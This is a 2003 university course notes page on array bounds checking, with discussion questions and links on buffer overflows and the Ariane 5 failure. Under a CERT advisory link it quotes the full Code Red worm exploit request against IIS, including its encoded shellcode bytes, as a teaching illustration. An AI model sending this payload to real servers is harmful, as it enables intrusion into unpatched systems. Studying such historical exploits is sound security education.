CS201J: Engineering Software, Fall 2003
Notes: Tuesday 30 September 2003
Assignments Due
- Thursday, 2 October: Problem Set 4, design document (2 copies)
Notes and Questions
What are the advantages and disadvantages of each approach to array bounds errors:
- No checking (C)
- Run-time checking (Java)
- Static checking (ESC/Java)
Links
Buffer Overflows
- CAIDA Analysis of Code Red
- CERT Advisory. The request that exploits the buffer overflow vulnerability: /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
- Smashing the Stack for Fun and Profit, Aleph One
- Improving Security Using Extensible Lightweight Static Analysis (David Evans and David Larochelle), IEEE Software, Jan/Feb 2002.
Run-Time Exceptions
- Reports on the Ariane 5 run-time exception: Lions Report (official inquiry); Jean-Marc Jézéquel and Bertrand Meyer; Stephen Marshall (includes video of explosion)
Our recommendation now is the same as our recommendation a month ago, if you haven't patched your software, do so now.
Scott Culp, security program manager for Microsoft's security response center
University of Virginia Department of Computer Science, CS 201J: Engineering Software
Sponsored by the National Science Foundation
cs201j-staff@cs.virginia.edu